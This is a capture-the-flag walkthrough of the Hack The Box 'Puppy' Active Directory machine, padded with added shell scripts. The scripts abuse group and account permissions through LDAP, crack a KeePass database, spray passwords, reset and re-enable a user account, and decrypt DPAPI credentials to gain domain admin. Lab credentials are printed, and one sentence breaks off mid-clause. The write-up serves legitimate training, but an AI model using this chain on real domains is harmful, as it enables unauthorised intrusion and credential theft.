HTB - Puppy

Description


This machine simulates an assumed breach scenario where initial access is already obtained. Using BloodHound, the player identifies a user with GenericWrite rights on a privileged group, enabling group membership manipulation. This escalation grants access to an SMB share containing a KeePass database secured with strong encryption, requiring the latest cracking tools. Further enumeration via BloodHound reveals a user with GenericAll rights over another account, allowing password changes. Leveraging this access leads to decrypted DPAPI credentials from a user folder, ultimately resulting in administrative access on the Domain Controller.

Enumeration


As is common in real-life pentests, you start the Puppy box with credentials for the following account: levi.james/KingofAkron2025!

I start with a normal Nmap scan, but first export the machine IP to a shell variable so it can be reused in every command.

Nmap Scan

Then put all the open ports into a ports variable and run an Nmap script and version scan (-sC -sV) against only those ports.
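The two-stage scan described above, written out as an added example (these are not the writeup's own commands; the target address is an assumption you export as IP, and the Nmap output used for the dry run is constructed, not captured from the box):

```shell
#!/bin/sh
# Added example (not the writeup's own commands): two-stage Nmap scan of the
# Puppy DC. Stage 1 finds open TCP ports quickly; stage 2 runs scripts and
# version detection only on those ports. The target address is an assumption:
# export IP=<machine address> before calling the scan functions.

# Turn Nmap "normal" output (-oN) into "53,88,445,..." for the -p option.
# Reads stdin so it works on a saved file or a pipe.
extract_ports() {
    grep -E '^[0-9]+/tcp +open' | cut -d/ -f1 | tr '\n' ',' | sed 's/,$//'
}

full_scan() {       # stage 1: every TCP port, no scripts, fast rate
    nmap -p- --min-rate 5000 -T4 -Pn -oN full.nmap "${IP:?export IP first}"
}

service_scan() {    # stage 2: default scripts + version detection on open ports only
    ports=$(extract_ports < full.nmap)
    nmap -sC -sV -Pn -p "$ports" -oN services.nmap "${IP:?export IP first}"
}

# Constructed stage-1 output (not a real scan of the box) for a dry run:
SAMPLE_NMAP='Nmap scan report for 10.0.0.1
Host is up (0.020s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http
636/tcp  open  tcpwrapped
5985/tcp open  http'

# Usage on a live target:  export IP=<address>; full_scan; service_scan
# Dry run of the parser:   printf '%s\n' "$SAMPLE_NMAP" | extract_ports
```

Splitting the scan this way keeps the slow script/version stage limited to ports that are actually open, and saving both runs with -oN leaves a record you can grep later instead of re-scanning.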

Summary

I started by enumerating SMB for accessible shares and found a DEV share, but levi.james had no access to it.

Before moving further, I updated /etc/hosts with the domain name and DC hostname so that Kerberos and LDAP tooling resolve the DC correctly.

I used bloodhound-python to collect domain data over LDAP, then ingested the resulting JSON into the BloodHound GUI to begin domain enumeration.

In BloodHound, levi.james is a member of the HR group and has GenericWrite on the Developers group. GenericWrite on a group includes writing its member attribute, so I can add levi.james to the Developers group.

Add levi to Developers group
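The collection and the group-membership change above, as an added example rather than the writeup's own commands. It assumes the domain is puppy.htb (the writeup does not name it), that the DC resolves as DC.puppy.htb from /etc/hosts with its IP exported as DC_IP, and that simple LDAP binds are accepted on port 389; the object DNs are looked up rather than guessed.

```shell
#!/bin/sh
# Added example, not the writeup's own commands. Assumptions: the domain is
# puppy.htb, the DC resolves as DC.puppy.htb (from /etc/hosts) with its IP in
# DC_IP, and the DC accepts simple binds over ldap:// (otherwise use ldaps://).
DOMAIN="puppy.htb"
DC="DC.puppy.htb"
BASE_DN="DC=puppy,DC=htb"
USER="levi.james"
PASS='KingofAkron2025!'

collect() {   # BloodHound collection as levi.james; produces a zip for the GUI
    bloodhound-python -d "$DOMAIN" -u "$USER" -p "$PASS" \
        -dc "$DC" -ns "${DC_IP:?export DC_IP first}" -c All --zip
}

lookup_dn() { # $1 = sAMAccountName; prints the object's distinguished name
    ldapsearch -x -LLL -H "ldap://$DC" -D "$USER@$DOMAIN" -w "$PASS" \
        -b "$BASE_DN" "(sAMAccountName=$1)" dn | sed -n 's/^dn: //p'
}

# GenericWrite on a group is enough to add members because it permits writing
# the group's "member" attribute. This emits the LDIF for that single change.
add_member_ldif() {  # $1 = group DN, $2 = member DN
    printf 'dn: %s\nchangetype: modify\nadd: member\nmember: %s\n' "$1" "$2"
}

add_levi_to_developers() {
    add_member_ldif "$(lookup_dn Developers)" "$(lookup_dn "$USER")" \
        | ldapmodify -H "ldap://$DC" -D "$USER@$DOMAIN" -w "$PASS"
}

verify_membership() {  # memberOf for levi.james after the change
    ldapsearch -x -LLL -H "ldap://$DC" -D "$USER@$DOMAIN" -w "$PASS" \
        -b "$BASE_DN" "(sAMAccountName=$USER)" memberOf
}

# Usage: export DC_IP=<address>; collect; add_levi_to_developers; verify_membership
```

The same write can be done in one line with Samba's `net rpc group addmem Developers levi.james -U 'puppy.htb/levi.james%KingofAkron2025!' -S DC.puppy.htb`; the LDIF form just makes it explicit which attribute the GenericWrite right is being used on. Group membership is evaluated at logon, so any existing SMB session has to be re-established before the new access shows up.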

With levi.james now a member of the Developers group, I listed the SMB shares again and found READ access to the DEV share.

I accessed the share using smbclient.py from the impacket toolkit and found a .kdbx KeePass password database.

After downloading it, I extracted a hash with keepass2john to crack it with john, but got this error:

The version of john shipped in the distribution repositories cannot parse the newer KeePass database format, but the latest jumbo build from the John the Ripper GitHub repository can. First, I downloaded the tool using the following commands:

Then I ran keepass2john and john from inside the freshly built repository and cracked the hash.
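An added example (not the commands from the writeup) that checks which KDBX format version a database uses before picking a tool, and builds the current jumbo john from source. The header check matters because KDBX 4 databases (the format that introduced Argon2 and a new header layout) are the ones older keepass2john builds reject; the header bytes used for the dry run are constructed.

```shell
#!/bin/sh
# Added example, not the writeup's own commands. Reads the KDBX header so you
# know whether the packaged john can handle the file, then builds the latest
# jumbo john from source. Wordlist path is an assumption.
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# KDBX header: bytes 0-3 = 0x9AA2D903, bytes 4-7 = 0xB54BFB67 (both little-
# endian), bytes 8-11 = version, high 16 bits major and low 16 bits minor.
kdbx_version() {  # $1 = path to .kdbx; prints "major.minor"
    sig=$(od -An -tx1 -N 8 "$1" | tr -d ' \n')
    if [ "$sig" != "03d9a29a67fb4bb5" ]; then
        echo "not a KDBX file (signature $sig)" >&2
        return 1
    fi
    set -- $(od -An -tu1 -j 8 -N 4 "$1")      # minor lo, minor hi, major lo, major hi
    echo "$(( $3 + $4 * 256 )).$(( $1 + $2 * 256 ))"
}

build_john() {    # clone and build bleeding-jumbo; binaries end up in john/run
    git clone --depth 1 https://github.com/openwall/john.git
    ( cd john/src && ./configure && make -s clean && make -sj"$(nproc)" )
}

crack_kdbx() {    # $1 = path to .kdbx; uses the freshly built tools
    ./john/run/keepass2john "$1" > keepass.hash
    ./john/run/john --wordlist="$WORDLIST" keepass.hash
    ./john/run/john --show keepass.hash
}

# Usage: kdbx_version recovery.kdbx   (4.x means you want the new build)
#        build_john && crack_kdbx recovery.kdbx
```

A KDBX 4 database uses Argon2 as its key derivation function, so cracking is slow by design; keep the wordlist targeted rather than throwing the full rockyou at it if the first attempt takes too long.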

After opening the database, I found several usernames, each with a password.

I extracted the passwords to a file and sprayed them against every user in the domain. First, I pulled a list of usernames with nxc.

With the user and password lists, I sprayed every password against every user and found a valid set of domain credentials.
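The user enumeration and spray, as an added example rather than the writeup's commands. It assumes DC_IP is exported, that nxc's --users table puts the username in the fifth column, and that passwords.txt holds the KeePass entries; the nxc output used for the dry runs is constructed (the passwords in it are invented), not captured from the box.

```shell
#!/bin/sh
# Added example, not the writeup's own commands. Assumes DC_IP is exported,
# passwords.txt holds the passwords pulled from the KeePass database, and that
# nxc's --users table has the username in column 5. Sample outputs below are
# constructed, with made-up passwords.

# Keep only usernames from `nxc smb ... --users`: drops the banner ([*]),
# auth result ([+]/[-]) and header (-Username-) lines.
users_from_nxc() {
    awk 'NF >= 5 && $5 != "-Username-" && $5 !~ /^\[/ { print $5 }'
}

dump_users() {
    nxc smb "${DC_IP:?export DC_IP first}" -u levi.james -p 'KingofAkron2025!' --users \
        | tee users.raw | users_from_nxc > users.txt
}

# Keep only successful logons ([+]) and print them as user:password.
parse_hits() {
    awk '/\[\+\]/ { print $6 }' | sed 's/^[^\\]*\\//'
}

# Every password against every user. --continue-on-success keeps going after
# the first valid pair; without it nxc stops at the first hit and you would
# miss a second account that reuses one of the same passwords.
spray() {
    nxc smb "${DC_IP:?export DC_IP first}" -u users.txt -p passwords.txt \
        --continue-on-success | tee spray.raw | parse_hits
}

SAMPLE_USERS='SMB  10.0.0.1  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:puppy.htb) (signing:True) (SMBv1:False)
SMB  10.0.0.1  445  DC  [+] puppy.htb\levi.james:KingofAkron2025!
SMB  10.0.0.1  445  DC  -Username-  -Last PW Set-  -BadPW-  -Description-
SMB  10.0.0.1  445  DC  Administrator  2025-01-01 10:00:00  0  Built-in account for administering the computer/domain
SMB  10.0.0.1  445  DC  levi.james  2025-01-01 10:00:00  0
SMB  10.0.0.1  445  DC  ant.edwards  2025-01-01 10:00:00  0'

SAMPLE_SPRAY='SMB  10.0.0.1  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:puppy.htb) (signing:True) (SMBv1:False)
SMB  10.0.0.1  445  DC  [-] puppy.htb\levi.james:Spring2025! STATUS_LOGON_FAILURE
SMB  10.0.0.1  445  DC  [+] puppy.htb\ant.edwards:Spring2025!
SMB  10.0.0.1  445  DC  [-] puppy.htb\adam.silver:Spring2025! STATUS_LOGON_FAILURE'

# Usage: export DC_IP=<address>; dump_users; spray
# Dry run: printf '%s\n' "$SAMPLE_USERS" | users_from_nxc
#          printf '%s\n' "$SAMPLE_SPRAY" | parse_hits
```

Keep the raw nxc output (users.raw, spray.raw) as well as the parsed lists: the status codes on the [-] lines are useful on their own, since a STATUS_ACCOUNT_DISABLED or STATUS_PASSWORD_EXPIRED hints that the password was right even though the logon failed.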

Foothold


In the BloodHound GUI, ant.edwards is a member of the Senior Devs group and has GenericAll on adam.silver, which means I can change adam.silver's password.

Take control of the user adam.silver

With adam.silver's account, I can access the machine via WinRM.

There is a problem, though: the account is disabled, so I had to enable it before I could use it.

Enable the account by setting userAccountControl to 512 (NORMAL_ACCOUNT with the ACCOUNTDISABLE bit cleared; a disabled normal account reads 514). Writing a flat 512 is fine when the current value is 514, but it silently drops any other flag that was set, so check the current value first and clear only the 0x2 bit if the account carries other flags.

Check Account Disable

Enable the account

Confirm it's enabled
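The password reset, the disabled-account check and the enable step above, as one added example (not the writeup's own commands). It assumes the domain is puppy.htb with the DC reachable as DC.puppy.htb and its IP in DC_IP, ant.edwards's password exported as ANT_PASS, the new password for adam.silver as NEW_PASS, and that simple LDAP binds are accepted on port 389.

```shell
#!/bin/sh
# Added example, not the writeup's own commands. Assumptions: domain puppy.htb,
# DC reachable as DC.puppy.htb with its IP in DC_IP, ant.edwards's password in
# ANT_PASS, NEW_PASS as the password to set on adam.silver, and simple binds
# accepted over ldap:// (switch to ldaps:// if the DC refuses them).
DOMAIN="puppy.htb"
DC="DC.puppy.htb"
BASE_DN="DC=puppy,DC=htb"
CTRL="ant.edwards"            # holds GenericAll over adam.silver
TARGET="adam.silver"

# GenericAll includes the reset-password right, so a plain SAMR reset works.
reset_password() {
    net rpc password "$TARGET" "${NEW_PASS:?export NEW_PASS first}" \
        -U "$DOMAIN/$CTRL%${ANT_PASS:?export ANT_PASS first}" -S "$DC"
}

ldap_attr() {  # $1 = attribute of the target to print
    ldapsearch -x -LLL -H "ldap://$DC" -D "$CTRL@$DOMAIN" -w "$ANT_PASS" \
        -b "$BASE_DN" "(sAMAccountName=$TARGET)" "$1" | sed -n "s/^$1: //p"
}

# Decode the userAccountControl bits that matter for logon.
uac_flags() {  # $1 = decimal value; prints one flag name per line
    v=$1
    [ $((v & 2)) -ne 0 ]       && echo ACCOUNTDISABLE
    [ $((v & 32)) -ne 0 ]      && echo PASSWD_NOTREQD
    [ $((v & 512)) -ne 0 ]     && echo NORMAL_ACCOUNT
    [ $((v & 65536)) -ne 0 ]   && echo DONT_EXPIRE_PASSWORD
    [ $((v & 4194304)) -ne 0 ] && echo DONT_REQ_PREAUTH
    return 0
}

# Clear only ACCOUNTDISABLE (0x2). A flat 512 gives the same result when the
# value is 514, but would drop e.g. DONT_EXPIRE_PASSWORD from 66050.
uac_enabled_value() {  # $1 = current decimal value
    echo $(( $1 & ~2 ))
}

set_uac_ldif() {  # $1 = user DN, $2 = new value
    printf 'dn: %s\nchangetype: modify\nreplace: userAccountControl\nuserAccountControl: %s\n' "$1" "$2"
}

enable_account() {
    set_uac_ldif "$(ldap_attr dn)" "$(uac_enabled_value "$(ldap_attr userAccountControl)")" \
        | ldapmodify -H "ldap://$DC" -D "$CTRL@$DOMAIN" -w "$ANT_PASS"
}

# Usage: reset_password
#        uac_flags "$(ldap_attr userAccountControl)"   # expect ACCOUNTDISABLE listed
#        enable_account
#        uac_flags "$(ldap_attr userAccountControl)"   # ACCOUNTDISABLE gone
#        evil-winrm -i "$DC_IP" -u adam.silver -p "$NEW_PASS"
```

Resetting a password and flipping userAccountControl both land in the DC's security log (4724 and 4738 on the target account), so on a real engagement note the original value and restore it afterwards.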

Access the box

User Flag: 4b47de5ca3f585dxxxxxxxxxxxxxxxx

Lateral Movement


Under C:\ there is a Backups folder.

I then downloaded the file to examine it on my Kali machine

After unzipping the file, I found a .bak file containing domain credentials for the user steph.cooper.

steph.cooper is a member of Remote Management Users, so I can access the box over WinRM as him.

Privilege Escalation


Inside steph.cooper's profile folder, where there are stored but DPAPI-encrypted credentials and the

With mimikatz.exe, I managed to extract the master key and then decrypt the DPAPI secrets with it.

Alternatively, download the credential file and the master key file to Kali and decrypt them offline with dpapi.py from impacket.
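The offline dpapi.py route above, as an added example (not the writeup's own commands). It assumes steph.cooper's profile, or at least the Credentials and Protect directories under AppData\Roaming\Microsoft, has been copied to Kali under PROFILE, and that his password is exported as STEPH_PASS; the directory tree used in the dry run is constructed, not copied from the box.

```shell
#!/bin/sh
# Added example, not the writeup's own commands. Assumes steph.cooper's profile
# has been copied to Kali under PROFILE and that STEPH_PASS holds his password.
# Artefact locations inside a Windows profile (roaming set, which is where a
# domain user's saved credentials normally end up):
#   AppData/Roaming/Microsoft/Credentials/<32 hex chars>     encrypted credential blobs
#   AppData/Roaming/Microsoft/Protect/<user SID>/<GUID>      master key files
#   AppData/Roaming/Microsoft/Protect/<user SID>/Preferred   pointer to the current key, not a key

find_credentials() {  # $1 = profile root; prints credential blob paths
    find "$1" -type f -path '*/Microsoft/Credentials/*' | grep -E '/[0-9A-Fa-f]{32}$'
}

find_masterkeys() {   # $1 = profile root; prints only GUID-named master key files
    find "$1" -type f -path '*/Microsoft/Protect/S-1-5-21-*' \
        | grep -E '/[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$'
}

sid_from_masterkey_path() {  # .../Protect/<SID>/<GUID> -> <SID>
    printf '%s\n' "$1" | sed -n 's#.*/Protect/\(S-1-5-21-[0-9-]*\)/.*#\1#p'
}

# Which master key does a blob need? Dumping the blob without a key prints its
# master key GUID, which must match one of the files from find_masterkeys.
show_blob() {  # $1 = credential blob
    dpapi.py credential -file "$1"
}

# A domain user's master key is protected with a key derived from the user's
# password, so password (or NT hash via -key) plus the user's SID unlocks it.
decrypt_masterkey() {  # $1 = master key file; prints the decrypted key (0x...)
    dpapi.py masterkey -file "$1" -sid "$(sid_from_masterkey_path "$1")" \
        -password "${STEPH_PASS:?export STEPH_PASS first}"
}

decrypt_credential() {  # $1 = credential blob, $2 = decrypted master key (0x...)
    dpapi.py credential -file "$1" -key "$2"
}

# Usage: for f in $(find_masterkeys "$PROFILE"); do decrypt_masterkey "$f"; done
#        decrypt_credential "$(find_credentials "$PROFILE")" 0x<key from above>
```

The on-host equivalent with mimikatz is `dpapi::masterkey /in:<master key file> /password:<password>` followed by `dpapi::cred /in:<credential blob> /masterkey:<hex key>`. When pulling the files over WinRM, remember that both directories are hidden, so list them with `-Force` (or `dir /a`) before downloading.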

The recovered credential is for steph.cooper_adm, who is an Administrator on the domain controller.

Get Root flag

Root Flag: e2353f53912199xxxxxxxxxxxxxxxxxxx
